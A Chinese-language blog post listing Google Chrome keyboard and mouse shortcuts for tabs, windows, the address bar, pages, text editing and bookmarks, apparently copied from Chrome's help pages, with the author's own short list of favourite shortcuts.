按 Ctrl+O,然后选择文件。 在谷歌浏览器中打开计算机中的文件。
按住 Ctrl 的同时点击链接。或用鼠标中键(或鼠标滚轮)点击链接。 从后台在新标签页中打开链接。
按住 Ctrl+Shift 的同时点击链接。或按住 Shift 的同时用鼠标中键(或鼠标滚轮)点击链接。 在新标签页中打开链接并切换到刚打开的标签页。
按住 Shift 的同时点击链接。 在新窗口中打开链接。
Ctrl+Shift+T 重新打开上次关闭的标签页。谷歌浏览器可记住最近关闭的 10 个标签页。
将链接拖到标签页中。在标签页中打开链接。
将链接拖到标签栏的空白区域。 在新标签页中打开链接。
将标签页拖出标签栏。在新窗口中打开标签页。
将标签页从标签栏拖到现有窗口中。 在现有窗口中打开标签页。
拖动标签页时按 Esc 将标签页恢复到原先的位置。
Ctrl+1 到 Ctrl+8 切换到标签栏中指定位置编号所对应的标签页。
Ctrl+9 切换到最后一个标签页。
Ctrl+Tab 或 Ctrl+PgDown 切换到下一个标签页。
Ctrl+Shift+Tab 或 Ctrl+PgUp 切换到上一个标签页。
Ctrl+Shift+Q 关闭当前窗口。
Ctrl+W 或 Ctrl+F4 关闭当前标签页或弹出窗口。
用鼠标中键(或鼠标滚轮)点击标签页。 关闭所点击的标签页。
右键点击或者点击并按住浏览器工具栏中的"后退"或"前进"箭头。 在新标签页中显示浏览历史记录。
按 Backspace 转到当前标签页的上一页浏览历史记录。
按 Shift+Backspace 转到当前标签页的下一页浏览历史记录。
用鼠标中键(或鼠标滚轮)点击工具栏中的后退箭头、前进箭头或转到按钮。 从后台在新标签页中打开按钮所对应的目标网页。
双击标签栏的空白区域。最大化窗口。

地址栏快捷键

在地址栏中可使用以下快捷键:

键入搜索字词,然后按 Enter 使用默认搜索引擎进行搜索。
键入搜索引擎关键字,按空格键,然后键入搜索字词,再按 Enter 使用与关键字相关联的搜索引擎进行搜索。
首先键入搜索引擎网址,然后在系统提示时按 Tab,键入搜索字词,再按Enter 使用与网址相关联的搜索引擎进行搜索。
Ctrl+L 突出显示网址。
Ctrl+E 在地址栏中输入"?"。在问号后键入搜索字词可用默认搜索引擎执行搜索。
同时按 Ctrl+Shift 和向左箭头键。 在地址栏中将光标移到上一个关键字词
同时按 Ctrl+Shift 和向右箭头键。 在地址栏中将光标移到下一个关键字词
Ctrl+Backspace 在地址栏中删除光标前的字词
用键盘上的方向键从地址栏下拉菜单中选择一个条目,然后按Shift+Delete 如有可能,则从浏览历史记录中删除所选条目。
用鼠标中键(或鼠标滚轮)点击地址栏下拉菜单中的一个条目。 从后台在新标签页中打开该条目。
显示地址栏下拉菜单时按 Page Up 或 Page Down选中下拉菜单中的第一个或最后一个条目。

网页快捷键

Ctrl+P 打印当前网页。
Ctrl+S 保存当前网页。
Ctrl+R 重新载入当前网页。
Esc 停止载入当前网页。
Ctrl+F 打开查找栏。
Ctrl+G 或 Enter 在查找栏中查找下一条与输入内容相匹配的内容。
Ctrl+Shift+G 或 Shift+Enter 在查找栏中查找上一条与输入内容相匹配的内容。
按住 Alt 键,然后点击链接。 下载链接目标。
将链接拖到书签栏中为该链接添加书签。
Ctrl+D 为当前网页添加书签。
空格键 向下滚动网页。
Home 转至网页顶部。
End转至网页底部。

文本快捷键

Ctrl+C 将突出显示的内容复制到剪贴板中。
Ctrl+V 或 Shift+Insert 从剪贴板中粘贴内容。
Ctrl+Shift+V 从剪贴板中粘贴内容(不带格式)。
Ctrl+X 或 Shift+Delete删除突出显示的内容并将其复制到剪贴板中。

http://www.google.com/support/chrome/bin/answer.py?hl=cn&answer=95743

比较实用的几个 
CTRL + H 历史记录
CTRL + O 打开计算机上的文件
CTRL + S 保存网页
CTRL + F 查找
CTRL + E 地址栏直接默认搜索引擎 搜索输入的关键字
CTRL + B 打开书签

将链接拖到书签栏中 为该链接添加书签。
Ctrl+D 为当前网页添加书签。
Ctrl+B 打开和关闭书签栏。
Ctrl+Shift+B 打开书签管理器。
Ctrl+H 打开"历史记录"页面。
Ctrl+J 打开"下载内容"页面。
Shift+Esc 打开任务管理器。
Ctrl+Shift+J 打开开发人员工具。
Ctrl+Shift+Delete 打开"清除浏览数据"对话框。
F1在新标签页中打开帮助中心(首选方式)。

按住 Ctrl 的同时点击链接。或用鼠标中键(或鼠标滚轮)点击链接。后台打开 标签
发帖者 时间: 没有评论:
订阅: 博文 (Atom)
 
/**/